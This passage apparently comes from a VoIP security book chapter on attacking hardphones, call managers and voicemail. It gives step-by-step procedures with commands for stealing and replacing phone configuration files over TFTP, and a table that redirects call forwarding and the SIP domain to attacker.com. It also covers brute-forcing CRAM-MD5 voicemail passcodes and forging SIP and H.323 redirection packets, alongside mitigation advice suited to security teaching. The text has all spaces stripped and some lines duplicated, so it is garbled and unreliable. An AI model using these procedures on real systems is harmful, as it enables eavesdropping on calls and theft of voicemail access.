iontothehardphone'sconnectivitymethod.Mosthardphoneshaveabuilt-inEthernetjackaswellasaconversiondevice,alargeblackblockthatresemblesapowersupply.Forexample,Avayahardphones'conversiondevicehastwoEthernetconnections,onethatconnectstothehardphone(labeledPhone)andanotherthatconnectstotheVoIPVLANthroughthewallEthernetjack(labeledLine).SomeonewhowishestosniffthenetworkshouldunplugtheEthernetcablethatisconnectedtoLineontheconversiondeviceandplugitintoahub.ThehubshouldthenbeconnectedbetweentheLinejackontheconversionblock,thewalljacktotheVoIPVLAN,andtheattacker'sworkstation(runningasnifferprogramlikeCain&AbelorWireshark).OnaCiscoVoIPhardphone,someonewhowishestosniffthe
networkshoulddisconnectthe10/100SWEthernetcablefromthebacksideofthephoneandplugitintoahub.ThepersonshouldthenconnectthehubtothesamejackusingasecondEthernetcable.Finally,thepersonshouldplugalaptop,withCain&AbelorWiresharkrunning,intothehubaswell.BoththelaptopandtheVoIPphone(specificallythe10/100SWjack)shouldbepluggedintothehub.Whilesettingthingsup,thepersonshouldbesurenottoplugthe10/100PClinkjackintothehubasthatwillnotbethecorrectsegmenttosniffon.Setupslikethesewillallowattackerstosniffthenetwork(evenwith802.1xinplace)andensurethatthehardphonesarestillinuse.Anattackerwhodoesnotneedthehardphonestobeinusecansimplyconnectaworkstationtothewalljackitself(assumingthatno802.1xauthenticationisrequired).Figure6-1showsanexample.
Figure6-1.SniffingsetuponVoIPnetworks
ThesetupwillallowtheworkstationtojointheVoIPnetworkandsniffthenetwork,withfulluseoftheVoIPhardphone.
Note✎
Iftheworkstationisconnectedbetweenthephonejackontheconversiondeviceandthehardphone,theattackerwillnotbeabletosniffthenetworkproperly;hence,thearchitectureforconnectivityisquiteimportant.
HardPhonesCisco,Avaya,andPolycomhardphonesareprobablythemostpopularphonesinenterprisenetworks.Regardlessofvendor,though,anytypeofhardphonecomeswithsecurityissues.Forexample,anattackercancompromisethephone'sconfigurationfileorsimplyuploadamaliciousone.Fortunately,usernameandpasswordinformationisusuallynotstoredinthehardphone'sconfigurationfile,sotheimpactanattackercanhaveifthefileiscompromisedissomewhatmitigated.Instead,therisksofahardphone'svulnerabilitiesaregeneralenumerationattacksandDenialofService(DoS)attacks.ThefollowingsectionswilldiscusstheseVoIPhardphonevulnerabilities:
Compromisingthephone'sconfigurationfileUploadingamaliciousconfigurationfileExploitingweaknessesofSNMP
CompromisingthePhone'sConfigurationFile
Mosthardphonesreceiveimportantfiles,suchasbootimagesorconfigurationfiles,overthenetwork.VoIPdevices,includingthosefromCiscoandAvaya,oftentransferthesefilesusingtheTFTPprotocol,butsomealsouseHTTP.Eitherway,anattackercanobtaincopiesofthesefilesquiteeasily.BothTFTPandHTTParecleartextprotocolsthatareoftenusedwithoutanyauthentication.Anattackerwhohasobtainedsuchfileshasaccesstothephone'ssettings,operatingfeatures,andoptions.Toobtainsuchafile,theattackerneedsonlytheTFTPserver'sIPaddressandthenameofthebootimageorconfigurationfile.InordertofindtheTFTPserver'sIPaddressonaCiscohardphone,forexample,theattackercansimplycheckthedisplayofthephoneitself.BychoosingtheOptionsmenuonthephoneandnavigatingtothenetworkconfigurationsettings,an
attackerwillfindmanyitemsdisplayed,includingtheTFTPserverusedonthenetworkaswellastheIPaddressofCiscoCallManager.OnanAvayanetwork,anattacker'ssniffingforUDPport69willidentifytheTFTPserver.(BecauseAvayahardphonesgetTFTPdownloadsafterreboot,theattackercansimplyrebootthephonewhilesniffingthenetwork.)OncetheattackerknowstheTFTPserver'saddress,shecansimplygrabthedesiredfileusingtheappropriateTFTPorHTTPGETcommand.Forexample,46xxsettings.txtistheconfigurationfileforanAvayahardphone.ByperformingaTFTPGETusingthatfilename,anattackercanpulldowntheconfigurationfilequicklyandeasily.Becausemostphonespullanupdatedconfigurationfileeachtimetheyarerebooted,anattackercanbereasonablysurethefilehegetsfromtheTFTPserveristhemostupdatedversion.Toobtainaphone'sconfigurationfile,anattackerwouldperformthesesteps:
1. ConnecttotheVoIPnetwork,asshownin"Vendor-SpecificVoIPSniffing"onVendor-SpecificVoIPSniffing.
2. LocatetheTFTPserverusedtouploadimages/configurationfilestohardphones.
3. LocatetheTFTPserverbysniffingthenetworkforthesourceaddressfromwhichTFTPconnectionsarrive.Aquicksearchforthe46xxsettings.txtfilewillhelplocatepacketswiththesourceTFTPserveronanAvayanetwork.Forthisexample,anattackershouldassumethattheTFTPserveris172.16.1.88.
4. EnterthefollowingataWindowscommandprompt:tftp172.16.1.88GET46xxsettings.txt
Bycompletingthesesteps,anattackercaneasilyandanonymouslyretrieveaphone'sconfigurationfilefromaTFTPserver.
UploadingaMaliciousConfigurationFile
Whenahardphonereboots,itoftendownloadsabootimageandaconfigurationfileoverthenetwork.Thesefilescontaininformationforthephonesettings,includingfunctionalityfeaturesandoptions.Asdiscussedintheprevioussection,thebootimageandconfigurationfilearetransferredfromthenetworktothehardphoneusingcleartextprotocols.Theuseofclear-textprotocolsgivesanattackertheabilitytointroduceherownmaliciousfilesintotheenvironment.Anattackerwhowantstoforceahardphonetoloadamaliciousconfigurationfilecanperformasimpleman-in-the-middleattack.ByfocusingtheattackonLayer2oftheOSINetworkingModel,anattackercanredirectallTFTP/HTTPrequestsawayfromtherealservertoamachineunderhiscontrol.Oncetheredirectionhasbeensetup,theattackercanpushmaliciousbootimages[9]andconfigurationfiles[10]tothehardphone.Thesefileswillbeinstalledduringthephone'sbootprocess,becausetheentiretransactionoccursovercleartextprotocols.Asaresultofthelackofcryptographicprotections,theuseofcleartextmakesitimpossibleforthehardphonetoverifythesendingserver'sidentity.Aftertheattacker'sbootimageandconfigurationfilehavebeenloadedonthehardphone,theattackerisabletocontrolthephoneanditsfeaturesremotely.Onlyafewphonefeaturesareattractivetoattackers.Infact,mostofthesettingsontypicalhardphonesareoflittleornointeresttoattackers.Theconfigurationfiletypicallyincludesinformationlikewhichdigittodialtomakeanoutsidecallandspeeddialsettings.However,changestocallforwarding,SIPre-registrationwaittimes,andcallrecordingallowanattackertointerceptvoicedatafromhertarget,sometimesevenwhenthephoneisnotinuse.Forexample,manyhardphonesallowuserstousethephoneasarecordingdevicewithoutplacingaphonecallorliftingthehandset.Thismeansthatwiththepropermalicious
handset.Thismeansthatwiththepropermaliciousconfigurationfile,thehardphonecanbesettorecordaudiofromthespeakermicrophone.Table6-1showsthesettingsfromanAvaya4600servicehardphonethat,toanattacker,wouldbemostinterestingtochangeanduploadtoatargeteddevice.Table6-1.SampleConfigurationInformationforAvaya4600HardPhones
Setting Description AttackPotential
SETDNSSRVR198.152.15.15SetstheDNSserverforthephone
AfakeDNSsettingwoulddisruptnameresolution,causingaDenialofService.Theattackercouldalsoredirectaphonetohisorherownmachine.
SETSYSLANGKatakanaSetsthedisplaylanguageforthephone
Anattackercansetthedisplaylanguagetosomethingunknownorrarelyused,suchasKatakana.
SETCALLFWDSTAT1Permitsunconditionalcallforwarding
Anattackercanhaveallcallsforwardedtoaspecifichardphone.Afterthecallisreceived,theattackercanthenexecuteathree-waycalltotheintendedtargetwhilestayingonthelinetolistentotheconversation.
SETCALLFWDADDRattacker@attacker.com
Setsthedestinationaddressforthecallforwardingfeature
Seeprevioussection.
SETREGISTERWAIT65536
Setsthetime,inseconds,betweenre-registrationswiththecurrentserver
Anattackercansettheregistertimeouttothemaximumvalue,allowingforaregistrationhijackattackonthesystem(showninChapter2).
SETSIPDOMAINattacker.com
Setsthedomainnametobeusedduring
Anattackercansetthedomaintoeitheramaliciousdomainserverorafakeone,causingtraffictoberedirected.
duringregistration
causingtraffictoberedirected.
SETSIPREGISTRAR192.168.0.1
SetstheIPaddressorFQDNoftheSIPregistrationserver
AnattackercansettheRegistrartohisorherownmaliciousserverorafakeone,allowingtheattackertoredirectcallsaccordingly.
Tocarryoutthisattack,anattackerwouldcompletethefollowingsteps:
1. ConnecttotheVoIPnetwork,asshownin"Vendor-SpecificVoIPSniffing"onVendor-SpecificVoIPSniffing.
2. LocatetheTFTPorHTTPserverusedtouploadbootimagesandconfigurationfilestohardphones.(TheprevioussectioncontainsdetailedinformationondiscoveringTFTPservers.)
3. StartaTFTPserveronherownmachineandensurethatthemaliciousfiles46xxsettings.txtanda01d01b2_3.bin(bootimage)areintherootoftheTFTPserverdirectory.
4. Unplugtheattackingmachinefromthenetwork,thenchangetheIPaddressofthatmachinetotheIPaddressoftheTFTPserver.
5. PlugtheattackingmachinebackintothenetworkandignoreanyIPaddressconflicterrors.
6. UsingCain&Abelontheattackingmachine,performaman-in-the-middleattack,redirectingalltrafficdestinedfortherealTFTPservertohisownmachine,whichwillhaveadifferentMACaddressbutthesameIPaddress.
Done!Whilethisattackwillbeintermittent,dependingonthelocationoftherealTFTPserver,hardphoneswillnowtaketheirimageandconfigurationsettingsfromthemalicioussource.
ExploitingWeaknessesofSNMP
Likemanydeviceswithanoperatingsystem,hardphonesoftenenablenetworkservicesforavarietyofmanagementpurposes.Specifically,VoIPhardphonesoftenhaveSimpleNetworkManagementProtocol(SNMP)enabled.SNMPisacommonmethodusedtomanagenetworkdevices.SNMPversion1(SNMPv1)isthemostpopularversion;however,itisalsotheweakest.SNMPv1isacleartextprotocolthatletsreadandwritecommunitystrings(whicharesimilartodevicepasswords)traversethenetworkwithoutencryption.Theuseofcleartextcommunitystringsisobviouslyaweaksecuritypractice.Furthermore,moreoftenthannot,thecommunitystringthatgrantsreadaccesstothedevicesanditsconfigurationinformationisusuallysetaspublic.Hence,anydeviceusingSNMPv1canbecompromisedbyeitheranattacker'sguessingaweakreadorwritecommunitystring(suchaspublicorprivate,respectively)orbyanattacker'ssniffingthenetwork.OnceanattackerhasgainedSNMPaccesstoahardphone,shecanaccessthephone'sspecificconfigurationsettings.Thisallowshertoperformfurtherattackswithadvancedinformationaboutthedevice,liketheroutetableofremotedevicesortheLDAPauthenticationserver.TopullinformationfromahardphoneusingSNMP,anattackerwouldcompletethefollowingsteps:
1. DownloadanSNMPtool,suchasGetIf,topullinformationfromSNMPdevices.GetIfcanbedownloadedfromhttp://www.wtcs.org/snmp4tpc/getif.htm/.
2. OpenGetIffromtheStartMenu(Start►Programs►GetIf).3. TypetheIPaddressofthehardphoneintheHostnametext
box.4. IntheSNMPParameterssection,entertheSNMPreador
writecommunitystring.Theattackerwouldleavethisas
publicorprivateifhehasnotalreadysniffedtheinformationoverthenetwork.
5. SelecttheStartbuttononthebottomright-handside.(Ifpublicisthecorrectreadcommunitystring,informationwillbedisplayedimmediatelyinthevarioustextboxes.)
6. Inordertogetthespecificconfigurationinformationfromthehardphone,selecttheMBrowsertab.
7. SelectStart.
ThespecificconfigurationinformationstoredinSNMPfileswillbedisplayedintheMBrowsertab.Theattackercansimplyexpandthe+symbolstolookforspecificinformation,asshowninFigure6-2.
Figure6-2.SNMPfilesfromhardphones
[9]a01d01b2_3.binonAvayahardphones[10]46xxsettings.txtforAvayahardphones
CiscoCallManagerandAvayaCallCenterCiscoCallManagerandAvayaCallCenter/ServerareproductsthathandlecallstoandfromVoIPhardphones.WhiletheCiscoandAvayaproductsmightbepopularproductsforenterpriseVoIPnetworks,opensourcesoftwaresuchasAsteriskcanalsobeused(ifstandardprotocolssuchasSIP,H.323,RTP,and/orIAXhavebeenimplemented).Anyserver'sinsecureuseofSIP,H.323,RTP,and/orIAXisofprimaryconcernwhenusingVoIP.Forexample,theauthenticationmethodforSIPisastrongsecurityconcern,regardlessofwhetherSIPhasbeenenabledonAvaya,Cisco,orevenAsterisk.Nonetheless,bothCisco'sandAvaya'sproductshaveaslewofinsecureservicesrunning,suchasTFTP,FTP,SNMP,telnet,andHTTP,thatshouldbedisabledimmediately.Furthermore,moresecureservices,suchasSSH,arenotupdatedoften,soexistingservicesmaybevulnerabletodatedsecurityattacks.Thissectionwillreviewcommoninfrastructuresecurityissuesonnetworkservices,including,butnotlimitedto,VoIPsoftwareanddevices.Table6-2listscommonlyusedinsecureservices,recommendationsformitigatingvulnerability,andthebestopensourcetoolfortestingtheissue.Table6-2.InsecureServicesUsedwithVoIP,MitigationRecommendations,andTestingTools
Services Recommendation Tool
FTP Disablecleartextmanagementprotocolsinfavorofencryptedcommunicationwithtwo-factorauthentication
Nmap,Nessus
telnet ImplementSSHwithtwo-factorauthentication Nmap,Nessus
OutdatedOpenSSH EnsureallSSHserversareuptodateandfullypatched Nmap,
Nessus
Outdated Nmap,
OutdatedOpenSSL EnsureSSLlibrariesareuptodateandfullypatched
Nmap,Nessus,Nikto
OutdatedApacheBuild
EnsureallwebserversareuptodateandfullypatchedNmap,Nessus,Nikto
CertificatesAllSSLcertificatesshouldbecurrentanduptodate.EnsurethattheSSLcertificationisnotself-signedandisforthecorrecthost(donotusethedefaultcertacrossallVoIPendpoints).
Nmap,Nessus,Nikto
SNMP EnableSNMPv3withcomplexanduniquecommunitystrings GetIf,Nessus
Logging Enableloggingoptionsonmediagateways N/A
Asmentionedpreviously,thebestwaytocheckforthesenetworkissuesisbyusingNmap(http://www.insecure.org/),Nikto(http://www.cirt.net/),orNessus(http://www.nessus.org/).Thesethreeopensourcetoolswillshowwhichportsareopen,whichwebapplicationdefaultsareexposed,andwhichnetworkservicesarevulnerable.AcombinationofthesethreetoolsonanyCiscoorAvayaVoIPapplication/appliancecanuncoveranyofthevulnerabilitieslistedinTable6-2andmuchmore.
UsingNmaptoScanVoIPDevices
Nmapistheindustry'smostpopularandmostsupportedportscanner.ByportscanninganyVoIPdevice,ausercanseeifvulnerableportsandserviceshavebeenenabled.Forexample,ifTCPports21(FTP),23(telnet),and80(HTTP)orUDPports69(FTP)or161(SNMP)appear,theattackerwillhaveafewavenuesforattack.Usingtheseservicesformanagementwillexposeadministrativepasswordsoverthenetworkincleartext,allowingasimpleman-in-the-middleattacktocompromisethedevicesandanyhardphonesregisteredtoaVoIPdevice.ToanalyzeaCiscoorAvayaVoIPapplication/appliancewith
Nmap,anattackerwouldcompletethefollowingsteps:
1. DownloadNmapfromhttp://www.insecure.org/.2. OnceNmaphasbeeninstalled,enterthefollowingata
commandprompttoenumerateany/allportsexposedonthedevice(where172.16.11.08istheIPaddressoftheCiscoCallManagerorAvayaCallCenter/Server):
nmap-sT-P0-p1-65535172.16.11.08
Figure6-3showstheexampleresultafterport-scanninganAvayaCommunicationManagerdevice.
Figure6-3.PortscanresultsonAvayaCommunicationManager
ScanningWebManagementInterfaceswithNikto
Niktoistheindustry'smostpopularCGIscannerforwebapplications.ByscanningthefileandservicesonVoIPwebmanagementinterfacesoverHTTP,anattackercanseewhatdefaultpagesorvulnerableattacksareenabledonthesystem.IfdefaultApachepagesareloadedorifdirectorybrowsingisallowedbythewebserver,thesystemcouldbevulnerableto
attack.ManagingVoIPproductsusingawebinterfacecanallowsimpleCGI,directorytraversal,andforcedbrowsingattackstograntunauthorizedusersaccesstothesystemandanyhardphonesregisteredtoit.TorunNiktoagainstaCiscoorAvayaVoIPapplication/appliance,anattackerwouldcompletethefollowingsteps:
1. DownloadNiktofromhttp://www.cirt.net/.2. OnceNiktohasbeeninstalled,enterthefollowingata
commandprompt(where172.16.11.08istheIPaddressoftheCiscoCallManagerorAvayaCallCenter/Server):
nikto.pl-host172.16.11.08
3. Reviewtheoutputtodiscoveranyandallvulnerablewebserversettings.
DiscoveringVulnerableServiceswithNessus
Nessusisanotherpopularscannerforsecurityvulnerabilities.UnlikeNmap,whichperformsportscanningonly,Nessuswillalsolookforvulnerableservicesrunningonthedevice.AndunlikeNikto,Nessuswillscanallportsonamachine,includingTFTP,SNMP,FTP,SSH,andthelike.Duringthescan,Nessussearchesforvulnerabilityissues,outdatedservices,andsecurityexploits.ToscanaCiscoorAvayaVoIPapplication/applianceusingNessus,anattackerwouldcompletethefollowingsteps:
1. DownloadNessusfromhttp://www.nessus.org/.2. Installtheapplicationbasedonthesetupinstructions.3. Onceinstallationiscomplete,openaNessusclientlike
NessusClient(http://www.nessus.org/download/index.php/)andconnecttotheNessusserver.
4. OnceconnectedtotheNessusserver,typetheIPaddressoftheCiscoCallManagerorAvayaCommunicationManagersystem.Afterthescaniscomplete,theNessus
reportwillshowallvulnerableservicesorsecurityexploitsontheexistingsystem.
ModularMessagingVoicemailSystemModularMessagingisavoicemailapplicationfromAvaya.TheapplicationintegrateswithAvaya'sVoIPdevices,allowinguserstologintoawebapplicationandchecktheirvoicemail.Inadditiontothewebapplication,ModularMessagingcanalsointegratewithMicrosoftOutlook,allowinguserstoimporttheirvoicemailsintoOutlook.AspecialOutlookplug-in,whichwillshowan"AvayaInbox"folderinauser'sOutlookclientaftertheplug-inhasbeeninstalled,isrequiredforthisfeature.Onceithasbeeninstalled,allvoicemailswillappearinOutlookunderthisnewlycreatedfolderassoundfiles.Unfortunately,ModularMessaginghasafewsecurityissuesthatthreatentheprivacyofuservoicemailmessages.Thefirstissueisthewebapplication'sdatavalidationmethods,whichcouldleadtosevereSQLinjectionandcross-sitescriptingvulnerabilities.Theapplication'sspecificsecurityflawsarebeyondthescopeofthisbook;however,thewebapplicationhasalotofroomforimprovementwhenitcomestosecureinputhandling.ThesecondaspectofModularMessaging,theOutlookplug-infeature,alsopresentssecurityissues.Theseissuesallowuserstocompromiseotherusers'voicemailboxes.Theplug-inrequiresauthenticationbetweentheModularMessagingserverandauser'sOutlookclient.TraditionalOutlookNTLMv1/v2orKerberosauthenticationisusuallywrappedwithSSL.However,theAvayaOutlookplug-inusesaweakchallenge/responsemethodoftenusedinSMTPorIMAPauthentication,knownasChallengeResponseAuthenticationMechanism(CRAM-MD5).WithAvaya'sModularMessagingserver,theCRAM-MD5hashiscreatedfromtheenduser'spasscodeandchallenge.ThechallengegivenbytheModularMessagingserverisBase64encoded,whichofferslittletonoprotectionbecauseitistrivialtoreverseusingahandfulofprograms.Furthermore,the
attackisevenmoretrivialthanmostofflinebrute-forceattacksbecauseavoicemailpasscodeusuallyconsistsofonly4numericfields.Becauseallcommunicationbetweentheuser'sOutlookclientandtheModularMessagingserverusescleartextprotocols,ausercansniffthechallenge,reversetheBase64encoding,andperformanofflinedictionaryattacktoretrievethevoicemailpasscodeforallvoicemailboxesonthesystem.Becausethepasscodeconsistsofonly4numericfields,theattackrequiresonly10,000attempts(0to9,999).TheseattemptscanbemadeinaboutfivesecondsonaPentium4processor.Onlywhenthepasscodeconsistsof14charactersdoesittakeconsiderablylongertocrack.Inordertocompletethisattack,amaliciousinsidermustpassivelysniffthenetworkandgainaccesstoallauthenticationattemptsfromtheOutlookclientandtheModularMessagingserver.(Note:Switchednetworksdonotpreventsniffingattacks.)Onceanattackerisabletosniffthenetwork,sheneedsonlytocapturetwoofthethreeitemsrequiredtocracktheaccountsoffline,includingthechallengeandtheresultingCRAM-MD5hash.BoththeCRAM-MD5hashandthechallengearesentoverthenetworkincleartext,allowingtheequationbelowtobetheattacker'srecipeforsuccess.Itemsinboldherearesniffedoverthenetworkanditemsinbolditalicarebrute-forced:
CRAM-MD5=Passcode+Challenge-CRAM-MD5=Ac2158a7d4c2287874d485501d67d807-Challenge=3458074250.7565974@mmlab2mss01lnx-Passcode=??????????495278A176DA26D72149954E06792CB7=MD5(0001+3458074250.7565974@mmlab2mss01lnx)1E6E2D30C84331475EB94D14BEAD1351=MD5(0002+3458074250.7565974@mmlab2mss01lnx)ADDD6C5A96E0545D75DC03270B40BAAF=MD5(0003+3458074250.7565974@mmlab2mss01lnx)9CDAB50A50CBD26A8511C3CAE6302701=MD5(0004+3458074250.7565974@mmlab2mss01lnx)AD7827249D7A704857161DFADCAE0A69=MD5(0005+3458074250.7565974@mmlab2mss01lnx)...AutomaticallyContinued...Ac2158a7d4c2287874d485501d67d807==MD5(2006+3458074250.7565974@mmlab2mss01lnx)-Match!!
Notethelastrowintheattackprocess,wheretheresultoftheguessedpasscodeof2006andthechallengeof3458074250.7565974@mmlab2mss01lnxisAc2158a7d4c2287874d485501d67d807.Thisisthesamevalue
Ac2158a7d4c2287874d485501d67d807.Thisisthesamevaluethatwassniffedoverthenetwork.Hence,theattackercanconcludethattheuser'svoicemailpasscodeis2006.InordertopreventauthenticationattacksonModularMessaging,useSSLwithLDAPtokeepattackersfromsniffingtheauthenticationcommunication.Alternatively,alongerPINcouldalsoberequired;however,thesizerequiredtopreventcrackingofthePINbecomesquitelarge(14),asshownhere:4numericfields:Lessthan1minute6numericfields:Lessthan1minute8numericfields:4minutes10numericfields:7hours12numericfields:32days14numericfields:7years16numericfields:700yearsTocompromiseauser'svoicemailpasscodeusingtheOutlookModularMessagingplug-in,anattackerwouldcompletethefollowingsteps:
1. Performaman-in-the-middleattackusingCain&Abel.See"UsingCain&AbelforMan-in-the-MiddleAttacks"onUsingCain&AbelforMan-in-the-MiddleAttacksformoredetails.
2. OnceauserchecksvoicemailviatheAyavaOutlookplug-in,selecttheSniffertabonthetoprow.
3. SelectthePasswordstabonthebottomrow.4. HighlightSMTPontheleftpane(seeFigure6-4).
Figure6-4.CapturedchallengesandCRAM-MD5hashesfromAvayaModularMessagingserver
5. Oncethechallengesandhasheshavebeencaptured,highlighttherowthatistobecracked,asshowninFigure6-4,wherethesecondrowishighlighted.
6. Right-clicktherowandselectSendtoCracker.7. SelecttheCrackertabonthetoprow.Thehashand
challengethatwerejustexportedfromthepasswordstabshouldappear.
8. Highlighttherow,thenright-clickandselectBrute-forceattack.
9. ClicktheStartbutton,andwithinafewsections,Cain&Abelwillhavecarriedoutabrute-forceattackonthepasscode,whichis2006(seeFigure6-5).
Figure6-5.Compromisedpasswordfromcarryingoutabrute-forceattackonCRAM-MD5hashesfromAvayaModularMessagingserver
InfrastructureServerImpersonationMovingbeyondattacksagainstinfrastructuresystems,attacksimpersonatinginfrastructureVoIPdevicesareabitmoreinteresting.Anattacker'sabilitytospoofalegitimategatekeeper,Registrar,Proxyserver,oranyotherVoIPauthenticationentitycanbequiteharmful.Thissectiondescribestheuseofafakeinfrastructuresystemtogainaccesstoauser'sVoIPcredentials,eavesdropontheuser'scalls,orredirectacall'sdestination.TheVoIPentitieswewilldiscussare:
SpoofingSIPProxiesandRegistrarsRedirectingH.323gatekeepers
SpoofingSIPProxiesandRegistrars
ManyspoofingattacksagainstVoIPnetworksthatuseSIParepossible,includingtheabilitytospoofinfrastructuresystemssuchasSIPProxyserversandSIPRegistrars.DuringaSIPINVITErequest,aSIPclientsendsaSIPProxyserverorRegistraranINVITEpacket.Beforethelegitimateservercanrespond,anattackercansubmitaforgedresponsethatappearstobefromtherealdomainbutthathasadifferentIPaddress,therebyredirectingtheUserAgenttoaSIPProxyserverorRegistrarcontrolledbytheattacker.Forexample,ifaSIPUserAgenttriedtocontacteNapkin(http://www.enapkin.com/)withthecontactaddress172.16.1.100,anattackercouldforgearesponsefromeNapkinwiththecontactaddressof172.16.1.150,whichisaSIPProxy/Registrarthattheattackercontrols.WhenthelegitimateUserAgentwishestocallusersineNapkin,theattackercanredirectcallstoanySIPclientofhischoosing.Inthisscenario,anattackercouldredirectcallstoaclienthecontrolsaswellasthelegitimateclientforthecall,allowingtheattackertolisten
toallcallstoorfromtheirtarget.ThespoofedSIPpacketfromtheattackerwouldlooksimilartothefollowing(noticetheContactline,wheretheIPaddressoftheattackerislisted):
SIP/2.0302MovedTemporarilyTo:<sip:Sonia@172.16.1.100>From:<sip:Raina@172.16.1.100>;tag=1108Call-Id:11082006@172.16.1.100CSeq:1INVITEContact:<sip:attacker@172.16.1.150>
OncetheUserAgentreceivesthespoofedpacket,itwillattempttocontacttheSIPProxyserverontheaddressspecifiedonthecontactfield.TheUserAgentwillthenbecommunicatingwiththefakeSIPProxyserverorRegistrar,thusallowingtheattackertocontroltheUserAgent'scommunicationpath.
RedirectingH.323Gatekeepers
H.323gatekeeperscanalsoberedirectedprettysimply,dependingontheimplementation.IfanH.323endpointdoesnothaveastaticgatekeeperset,itsearchesforonebysendingaGatekeeperRequest(GRQ)packetoverthenetworkto224.0.1.41onport1718.[11]EachH.323endpointwillusethisaddresstofindthelocalgatekeeperonthenetwork.ThetrickherefortheattackeristorespondtothepacketfirstandtelltheH.323endpointtoregistertoagatekeeperunderhercontrol.TheGatekeeperConfirmation(GCF)packetsentbytheattackercanforceH.323endpointstoroutealltheircalls,bothcleartextandencrypted,throughamaliciousintermediary.Alternatively,toensurethatthecalliscompletedproperly,themaliciousgatekeepercanpointtothelegitimategatekeeperonthenetwork,ensuringthatallcallsareactuallyrouted.OncetheH.323endpointagentreceivestheGCFpacket,theendpointwillthenbecommunicatingwiththeattacker'sgatekeeper,thusallowingtheattackertocontrolthevoicecommunicationpath.Inmanysituations,astaticIPaddresswillbeenteredforanendpoint'sgatekeeper;however,thatstilldoesnotpreventthe
endpoint'sgatekeeper;however,thatstilldoesnotpreventtheredirectionattack.Evenifanendpointdoesnotsendadiscoverypacketto224.0.1.41,anattackercanstillupdatetheendpoint'sgatekeeperinformationwithmaliciousdata.Inordertoperformthisattack,anattackercanmonitorthenetworkandwaituntiltheendpointisrebootedorsimplyforcearebootbyperformingaDoSattackontheendpoint.Whenanendpointbeginsthebootprocess,itlooksforitsstaticallyenteredgatekeeperaddress.Atthistime,anattackercanoverridethestaticentrywithitsforgedGCFresponse,containingitsowngatekeeperinformation.Muchasintheprevioussituation,theGCFpacketsentbytheattackerwillforcetheH.323endpointtoupdateitsgatekeeperinformation.Thus,whileastaticallyenteredgatekeeperaddresshasbeenusedonthenetwork,theendpointwillstilloverridethatinformationifaGCFpacketisreceivedfromthenetworkwithnewinformation.Oncethenewinformationisreceived,thedataintheGCFpacketwillbeusedbytheendpoint.Itshouldbenotedthattheattacker'sGCFpacketmustreachtheendpointsbeforethelegitimategatekeeper'sGCFpacket,whichmeansthattimingandproximityarekeyrequirementsifsuchanattackistobesuccessful.ThisallowsanattackertocontrolthevoicecommunicationpathofH.323endpoints.
[11]224.0.1.41isareservedClassDmulticastaddressforgatekeeperdiscovery.
SummaryVoIPinfrastructuresystemsarethebackboneofvoicecommunication.H.323endpointsandSIPUserAgentsrelyonthesesystemstoensurethatcallsaremanagedproperlyandsecurely.ThischaptershowedhowVoIPsoftwareandhardwareappliancescanbeattackedand/orabusedsimilarlytothewayanyothertechnologywithaTCP/IPstackcanbeattackedand/orabused.Forexample,avulnerableCiscorouterrunningTFTPisnotmuchdifferentfromavulnerableCisco/AvayahardphonerunningTFTP.BothdevicesarevulnerabletoallattacksthatfallundertheTFTPumbrella.WhetheritisahardphoneorCisco/AvayaCallManagersoftware,eachservicerunningonthesesystemsneedstobesecured.AdvancedapplicationsusingVoIPtechnology,suchasvoicemailapplications,needtobehardenedalso.Theassumptionofprivacyonvoicecallscarriesovertovoicemails;therefore,theargumentoftreatingemail,whichmostpeopleknowisnot100percentprivate,similarlytovoicemail,whichisalsonot100percentprivate,butisassumedtobe,doesnotapplywell.Whileweakvoicemailpasswordshavenotgenerallyhadadirecteffectonprivacy,VoIPchangesthatsituationasbrute-forceattacksonfour-digitvoicemailpasswordscanbecarriedoutofflineinamatterofminutes.Lastly,criticalVoIPinfrastructuresystems,suchasSIPRegistrars,SIPProxyservers,andH.323gatekeepers,canallbeeasilyspoofed.Anattacker'sspoofingtheseentities,whichareoftenresponsibleforauthentication,willspellbadnewsforthenetworkanditsusers.Hence,thereisastrongneedforVoIPinfrastructuresoftwareandhardwaretobesecured,alongwiththeprotocolstheyuse.IfVoIPisgoingtoprovideanysecurityguaranteestoitsusersandcustomers,itmustresideonaninfrastructurethatcanberegardedassecure.AttackerswhoareboredwithalltheattacksonSIPandH.323
mayfinditeasiersimplytoattacktheVoIPbackbonecomponentstohaveagreaterimpactonthesystem.Thedevelopmentofaninfrastructurethatisimmunetousers'sniffingonthenetworkorsecurityattacksonTFTP,DNS,andDHCPisdesperatelyneeded.VoIPsoftwarevendorsneedtoconsidertheirproductsasadatabaseofsensitivedataintheaudioformat(ratherthanthefileformatusedbyOracleandSQLServer)andprovidesecurityprotectionsappropriately.Also,VoIPnetworkdevicesmustbeabletoprotectagainstserverimpersonationorredirection.Properauthenticationandintegritycheckingarepopularforclient-to-servercommunicationbutshouldalsobeusedforserver-to-clientverificationaswellasservertoserver.
Chapter7.UNCONVENTIONALVOIPSECURITYTHREATSInadditiontoprotocolattacksonSIP,H.323,IAX,andRTP,aswellasattacksagainstspecificVoIPproducts,manyunconventionalattacksagainstVoIPnetworkscancausealotofharm.Forexample,intheemailworld,aspamattackisneithersophisticatednorcomplextoperform;however,theheadachesspamhasbroughttoemailusers,fromthenuisanceofbulkemailtophishingattacks,makespamamajorissueforemailusers.ThischapterwilltakeasimilarapproachtoVoIPbyshowingexistingattacksthathavethepotentialtobeamajornuisance.ThefocusofthischapterwillbehowVoIPtechnologies,whileverycomplexthemselves,arestillopentomanysimpleattacksthatcancausealotofdamage.Whentheseminorflawsareappliedtotrustedentities,suchasauser'stelephone,theyhavetheabilitytotrickusersintodoingthingstheynormallywouldnotdo.When,forexample,anemailasksyoutoclickalinkandsubmityourpersonalinformation,mostusersarewiseenoughtoignorethatrequest.However,whatifusersreceivedanautomatedphonecallpurportedlyfromtheircreditcardcompany'sfrauddetectionservices?Wouldusersfollowthedirectionsinthemessage?Wouldtheycheckifthe800numberprovidedinthemessagematchestheoneonthebackoftheircreditcard?Thisscenario,alongwithmanyothers,isdiscussedinthischapter.TheattacksshowninthischaptercombinetheweaknessesofVoIPnetworks,theabilitytoperformsocialengineeringattacksonhumanbeings,andtheabilitytoabusesomethingweallfeelistrustworthy(ourtelephone)tocompromiseVoIPendusers.Specifically,theattacksshowninthischapterarethefollowing:
VoIPphishing
Makingfreecalls(intheUnitedStatesandUnitedKingdom)CallerIDspoofingAnonymouseavesdropping/callredirectionSpamOverInternetTelephony(SPIT)
Beforewebeginthischapter'sdiscussions,takeafewmomentstosetupthenecessarylabenvironment.Completingthefollowingstepswillensurethattheproofofconceptattacksshowninthischapterwillworkcorrectly.
